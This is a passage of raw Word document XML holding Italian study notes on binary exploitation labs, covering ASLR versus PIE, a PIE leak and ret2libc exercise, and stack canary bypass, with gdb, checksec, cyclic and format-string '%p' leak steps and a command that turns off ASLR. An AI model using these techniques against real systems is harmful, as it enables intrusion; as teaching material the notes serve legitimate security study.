          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dipendenza:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Non dipende da un'apposita compilazione dell'eseguibile. Funziona anche con eseguibili non compilati in modo specifico per ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B3D2CD" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PIE (Position Independent Executable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AADC3C" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cosa fa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> PIE è una tecnica di compilazione che fa sì che l'eseguibile possa essere caricato in memoria a qualsiasi indirizzo senza la necessità di essere "riposizionato" (relocated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCFDADE" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Obiettivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Rende più efficace l'ASLR. Infatti, senza PIE, anche se ASLR randomizza gli indirizzi, l'eseguibile stesso sarebbe sempre caricato allo stesso indirizzo relativo alla base, rendendo la base facilmente prevedibile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C2DE0" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Come funziona:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Il codice dell'eseguibile viene compilato in modo tale da non contenere indirizzi assoluti, ma piuttosto indirizzi relativi alla base dell'eseguibile. Durante l'esecuzione, il caricatore del sistema operativo aggiunge la base dell'eseguibile casualmente assegnata, rendendo gli indirizzi effettivi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624898D4" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ambito:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> È una tecnica a livello di compilazione. Richiede che l'eseguibile sia compilato con l'opzione PIE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BEE89" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dipendenza:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Dipende dalla compilazione dell'eseguibile. Un eseguibile non compilato come PIE non sfrutterà pienamente i vantaggi di ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B8964" w14:textId="068C289F" w:rsidR="00C55714" w:rsidRPr="00FC0556" w:rsidRDefault="00FC0556" w:rsidP="00C21978">
      <w:r w:rsidRPr="00FC0556">
        <w:t>ASLR è i</w:t>
      </w:r>
      <w:r>
        <w:t>l concetto a livello generale nel SO, invece PIE è la stessa cosa ma sul binario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E6B58" w14:textId="1B7B114A" w:rsidR="00C21978" w:rsidRPr="00FC0556" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0556">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>08-leak_pie_ret2libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF32CB6" w14:textId="1EC324F0" w:rsidR="00AF5671" w:rsidRPr="00FC0556" w:rsidRDefault="00AF5671" w:rsidP="00AF5671"/>
    <w:p w14:paraId="4EB239B1" w14:textId="6C1EB493" w:rsidR="00FC0556" w:rsidRPr="00AB3559" w:rsidRDefault="00FC0556" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00AB3559">
        <w:t>$ file pie-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03405DFF" w14:textId="0C93472A" w:rsidR="00FC0556" w:rsidRPr="00AB3559" w:rsidRDefault="00FC0556" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00AB3559">
        <w:t>$ checksec --file pie-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EF24A" w14:textId="62C0B206" w:rsidR="00FC0556" w:rsidRDefault="00FC0556" w:rsidP="00FC0556">
      <w:r w:rsidRPr="00FC0556">
        <w:t>$ ldd pie-server --&gt; eseguendolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> più volte si nota che l’indirizzo base cambia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179AACF4" w14:textId="105BFAE9" w:rsidR="00FC0556" w:rsidRDefault="00FC0556" w:rsidP="00FC0556">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --&gt; disabilita la randomizzazione (disabilita l’ASLR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0B178" w14:textId="7573922D" w:rsidR="00FC0556" w:rsidRDefault="00837E63" w:rsidP="00FC0556">
      <w:r>
        <w:t>$ ghidra --&gt; se vogliamo controllare al volo il disassembler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB7AEA" w14:textId="77777777" w:rsidR="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:r>
        <w:t>Quello a cui miriamo è riuscire a prelevare la GOT (Global offset table).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D14E4" w14:textId="77777777" w:rsidR="00A82DB7" w:rsidRPr="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$gdb pie_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FE4BC" w14:textId="77777777" w:rsidR="00A82DB7" w:rsidRPr="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ break main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354A9DC" w14:textId="77777777" w:rsidR="00A82DB7" w:rsidRPr="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC015B" w14:textId="613751B1" w:rsidR="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:r w:rsidRPr="00A82DB7">
        <w:t>$ piebase --&gt; help se vogliamo altr</w:t>
      </w:r>
      <w:r w:rsidR="00AC25C2">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82DB7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5DA7C" w14:textId="037728C4" w:rsidR="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:r w:rsidRPr="00A82DB7">
        <w:t>$ break rva --&gt; breakpoint auto alla base di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043419E" w14:textId="700A5DDA" w:rsidR="00A82DB7" w:rsidRDefault="00A82DB7" w:rsidP="00FC0556">
      <w:r>
        <w:t>$ breakrva indirizzo_trovato_con_ghidra_corrispondente_al_gets_nella_GOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D6438" w14:textId="72BBDC06" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ cyclic 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BB6F3" w14:textId="257F9286" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E7503" w14:textId="240CB611" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; NAME: %p %p %p %p %P </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3AEF16" w14:textId="75CEEF37" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C830019" w14:textId="71A94491" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091141A" w14:textId="75A1AF5F" w:rsidR="00AC25C2" w:rsidRPr="00AB3559" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; NAME: output_of_cyclic_500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E891FB3" w14:textId="27F6705F" w:rsidR="00AC25C2" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:r>
        <w:t>$ cyclic -l -qaac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588611D6" w14:textId="0A3883F2" w:rsidR="00AC25C2" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:r>
        <w:t>&gt;&gt; 264</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D907B4" w14:textId="65105437" w:rsidR="00AC25C2" w:rsidRDefault="00AC25C2" w:rsidP="00FC0556">
      <w:r>
        <w:t xml:space="preserve">Ci creiamo uno script come il fuzz e </w:t>
      </w:r>
      <w:r w:rsidR="00755438">
        <w:t>vediamo qual è l’indirizzo che ricorre più spesso, e ne controlliamo il contenuto con gdb: x address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0ECB9" w14:textId="0CAB9E1A" w:rsidR="00755438" w:rsidRDefault="00755438" w:rsidP="00FC0556">
      <w:r>
        <w:t>Prendiamo l’indirizzo di base del programma e lo sottraiamo da quello di libc trovando il valore dell’offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B71FAF0" w14:textId="1B06ADCF" w:rsidR="00755438" w:rsidRPr="00A82DB7" w:rsidRDefault="00755438" w:rsidP="00FC0556"/>
    <w:p w14:paraId="566E8D63" w14:textId="33D349CC" w:rsidR="00837E63" w:rsidRPr="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>09-overwriting_go</w:t>
      </w:r>
      <w:r w:rsidR="00837E63" w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A08054" w14:textId="44E6E662" w:rsidR="00C55714" w:rsidRPr="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10-bypassing_canaries/canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC83129" w14:textId="4E0E4D3A" w:rsidR="00562D9A" w:rsidRPr="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACEC31E" w14:textId="06090A97" w:rsidR="00562D9A" w:rsidRPr="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ file canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC25BB" w14:textId="2430043B" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:r>
        <w:t>$ checksec canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27661D96" w14:textId="327A56EE" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:r>
        <w:t>Se eseguiamo il file e proviamo a mandarlo in segmentation fault notiamo che in qualsiasi modo proviamo a procedere non riusciamo ad arrivarci.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D521DF8" w14:textId="1A65C36D" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31A878B2" wp14:editId="13B9464E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>26009</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7044055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5661964" cy="3508554"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="244525849" name="Immagine 1" descr="Immagine che contiene testo, software, Icona del compute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5849" name="Immagine 1" descr="Immagine che contiene testo, software, Icona del computer, schermo&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="14582"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5661964" cy="35085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ghidra --&gt; analizziamo il file su ghidra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C922B99" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="0684B3D4" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="3532D02F" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="5A10D0B6" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="3D926224" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="305E6940" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="472AB580" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="289A715A" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="1374F14A" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="697B936F" w14:textId="77777777" w:rsidR="00562D9A" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:p w14:paraId="10E3C6BE" w14:textId="4F7CC5AE" w:rsidR="00562D9A" w:rsidRDefault="00A33364" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00A33364">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B799EBD" wp14:editId="7496E92C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-522605</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>241300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7174865" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2069248898"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8898" name="Immagine 1" descr="Immagine che contiene testo, schermata, line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7174865" cy="1638300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Visualizzando da ghidra la funzione vuln:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA5BCA" w14:textId="6A653413" w:rsidR="00A33364" w:rsidRDefault="00A33364" w:rsidP="00562D9A"/>
    <w:p w14:paraId="56CE6762" w14:textId="67C517D2" w:rsidR="00A33364" w:rsidRDefault="00A33364" w:rsidP="00562D9A">
      <w:r>
        <w:t xml:space="preserve">Notiamo che l’istruzione di ritorno sta alla base (AL:1), </w:t>
      </w:r>
      <w:r w:rsidR="0001158F">
        <w:t>fino al canary vediamo che lo stack arriva a 0x10 quindi sono 16 byte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il buffer è dichiarato a 64 </w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>; quindi, 64</w:t>
      </w:r>
      <w:r w:rsidR="0001158F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> di buffer sommati ai 16 b</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> precedenti sono 80</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00FE5FC5">
        <w:t>yte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in hex 0x50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279E6FD" w14:textId="2D6EBFC3" w:rsidR="00A33364" w:rsidRDefault="0001158F" w:rsidP="00562D9A">
      <w:r>
        <w:t xml:space="preserve">Entrando nel buffer dobbiamo spostarci per 64 byte prima di raggiungere il canary (perché ci muoviamo dalla cima del buffer </w:t>
      </w:r>
      <w:r w:rsidR="003C22D0">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>0-&gt;…-&gt;10: canary {</w:t>
      </w:r>
      <w:r w:rsidR="003C22D0">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0hex:80dec -&gt; 10hex:16dec}), sappiamo anche che tutti gli indirizzi di ritorno a 32 bit sono di 8 byte (a 64 bit sono 16 byte) quindi l’indirizzo di ritorno 8 byte + 4 byte (local_8) + x </w:t>
      </w:r>
      <w:r w:rsidR="003C22D0">
        <w:t xml:space="preserve">byte </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(canary) = 16 (byte mancanti </w:t>
      </w:r>
      <w:r w:rsidR="003C22D0">
        <w:t>per arrivare da canary a 0), quindi il canary vale 4 byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A3BCB" w14:textId="05977C2A" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r w:rsidRPr="0013215B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F830DA8" wp14:editId="1AA0F703">
            <wp:extent cx="6120130" cy="815975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="282660494" name="Immagine 1" descr="Immagine che contiene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0494" name="Immagine 1" descr="Immagine che contiene testo, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="815975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B2726" w14:textId="61AEF87A" w:rsidR="0013215B" w:rsidRPr="00A615C5" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A615C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ gdb canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6641C" w14:textId="20C013B8" w:rsidR="0013215B" w:rsidRPr="00A615C5" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A615C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ info function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D2F08" w14:textId="7D04083F" w:rsidR="0013215B" w:rsidRPr="00A615C5" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A615C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ disassemble vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6FFA4" w14:textId="7E0B34D0" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t>$ break *indirizzo_del_printf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9C721" w14:textId="71D7EB47" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D526C" w14:textId="2BC40E09" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t>$ canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170814BF" w14:textId="3458FFDC" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t>&gt;&gt; restituisce possibili indirizzi del canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBF256" w14:textId="5D093808" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t xml:space="preserve">$ x/100x $esp --&gt; stampiamo 100 valori dallo stack poiner (esp) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27252A9F" w14:textId="787F5647" w:rsidR="0013215B" w:rsidRDefault="0013215B" w:rsidP="00562D9A">
      <w:r>
        <w:t>Notiamo che il canary restituito da gdb dista 24 (contiamo per colonne) dall’esp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00CA8F" w14:textId="3E4AE22A" w:rsidR="0013215B" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00F632DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59D32D7D" wp14:editId="065DEEC4">
            <wp:extent cx="6106584" cy="1272845"/>
